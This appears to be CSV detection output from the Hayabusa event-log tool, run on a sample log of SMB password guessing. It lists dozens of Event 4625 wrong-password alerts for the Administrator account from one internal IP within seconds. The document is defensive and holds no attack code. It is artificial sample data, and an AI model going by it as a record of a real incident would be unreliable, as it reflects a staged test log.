2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIJ9mZczFO1GKItV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wW0vxE4o68L70Sra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOn9DzB1yWtntyX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m9uGgocAVReiJWDm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qm9Jf1fles2HOb3g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ev5eTWdf3CskOMuh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoiMO6sSLOm4fOD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDjvMsa2IgR9KO7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SR7gVjxHZDYeK7pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4jzGAepr7JeNKuuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H9baxEeRCWjx6Fzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uy7aTt0B4ErguacA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvKcLrUXqu2vTKO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLycXLeAU21pdnXL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgwjJSKOPnurDWW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPDYdxPoQAl8aGMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CX8knunlT6SMpmQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAjYbt50leZt3Xve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CD0HUCdg4UWOiji | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dkeWmTE1R1rYaYP8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W87qcfSj4qWWUv4k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WUCyUQgbUqwaLj3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9nLhDbcvmVBZp4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBWo1zDdjaAeGDWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjHRFk2flmzzd1zg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 53HYxs9s7fpP1y6V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tluqXKvVooP7VNyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43m0nfi5tiv4TpSB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qjPyJXl984vViV6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MomQ8Yt51VsMiO4p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LJYCi5r2otMHxA8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4oUSkMBI8SGDLwYC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j1x3lyRjxn73KITB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh05BhGpwq1ho62a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxj6ITbiciyRNLbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uev2mjCaqHjm6NYi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L4WU383o9E5JyM5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfMv0lsoiRnTCFXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL4ahBqUyGeTONkE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8hJ888Kmyi6KqIPn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VZ6sfYMHuygnMdY2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XkuSlyTNc5OOoUtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Z13YmupcMato8Sd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JedeMnLPnRJEwhZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmy0c0wFheIRzSo4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sskKdqku5S0f1sWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 15Qg0nCXNj7Ub1Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZD6iuaqv70k69G87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gk3UuqTJmvH1snmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaw9iF5mJlyygdnB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Sr5PZAd1qMc7hi3c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l5xbQtyueVq3fJSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g2nP0zz2ofBxTGw6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SYJheREJmEwj0791 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: exglD9fnLwaqwRZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bSAU1QjasDAsmry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cfnrtXR7evQBbaOw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYAwjW99chcntPsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rG2PYfOTfT7QvbPu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FojDtfDNXq0gQfYu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SUTT0QycbFtyJfNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gcbv1lrcYdT9Wuli | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjdFfvCCfGXo7FUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzqGdWlGglLQx6Z4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3Rt80PMk70sVqbk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: okunzcEHnxUml4SG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qH0AY3DeIryuHSiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DjqtxY5Fly4qAusS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PXHYu7wAqo7m6mZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaEM3boErBRrCbna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nSzwstH2imPjwah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6NM0I4vRTXlLKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jYhjN3f8KlFIEUKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qWicYt2HXLDgc3kc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
